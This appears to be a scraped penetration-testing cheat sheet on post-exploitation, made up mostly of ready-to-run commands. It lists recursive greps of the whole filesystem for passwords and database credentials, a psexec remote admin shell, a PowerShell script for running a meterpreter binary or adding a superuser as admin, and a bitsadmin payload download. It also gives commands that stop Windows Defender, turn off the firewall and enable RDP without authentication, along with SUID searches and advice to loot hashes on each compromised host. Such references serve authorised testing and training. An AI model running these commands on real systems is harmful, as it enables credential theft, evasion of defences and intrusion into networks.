Post Exploitation
https://sushant747.gitbooks.io/
grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always
cat file2upload | base64
Once the file is converted to base64, you can just create a new file on the remote system and copy the base64 output of the above file into it. Next step would be to reverse the base64 to binary
cat fileWithBase64Content | base64 -d > finalBinary
You can also use the smbserver.py from Impacket’s repo to host a temporary smb server and fetch files in windows from remote smb servers using the net use command.
.\psexec64.exe \192.168.x.x -u .\administrator -p [email protected] cmd.exe
Eg: Get cmd.exe shell of remote system with user administrator and password as [email protected]
There maybe times when you know the creds to admin, but will have a low privileged shell. Unlike Linux, we cannot sudo on windows machines. So, I wrote a simple powershell script for that which can run a separate file as admin. You can run a batch file to add a new superuser or just execute a meterpreter binary as admin. The below command is to be run in a powershell window:
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
If however you want to run the powershell from a cmd prompt, you can run store the above command in a xyz.ps1 file and run it in cmd as below:
powershell -ExecutionPolicy Bypass -File xyz.ps1
Download files in Windows with
bitsadmin bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\Users\%USERNAME%\AppData\local\temp\xyz.exe
Disable firewall/defender and enable RDP for all Sometimes you will have the admin creds and may require an RDP Session to find out what exactly is going on in the backend for post exploitation. Below commands will help you disable firewall and enable RDP over insecure connections
sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Print files with the line number where the string is found grep -rnw '/' -ie 'password' --color=always
find / -perm -4000 -type f 2>/dev/null
find / -perm -777 -type f 2>/dev/null
find / perm /u=s -user `whoami` 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / perm /u=w -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
find / -perm /u+w -user `whoami` 2>/dev/nul
find / perm /u=w -type -d -user `whoami` 2>/dev/null
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
In order to move horizontally on the network we need to know as much about the machine as possible. We need to loot it. These are some things that must be done on every compromised machine.
Who else is connected to the machine?
It is always good to have a list of all the hashes and crack them. Maybe someone is reusing the password.
netstat
ipconfig
Last modified 3yr ago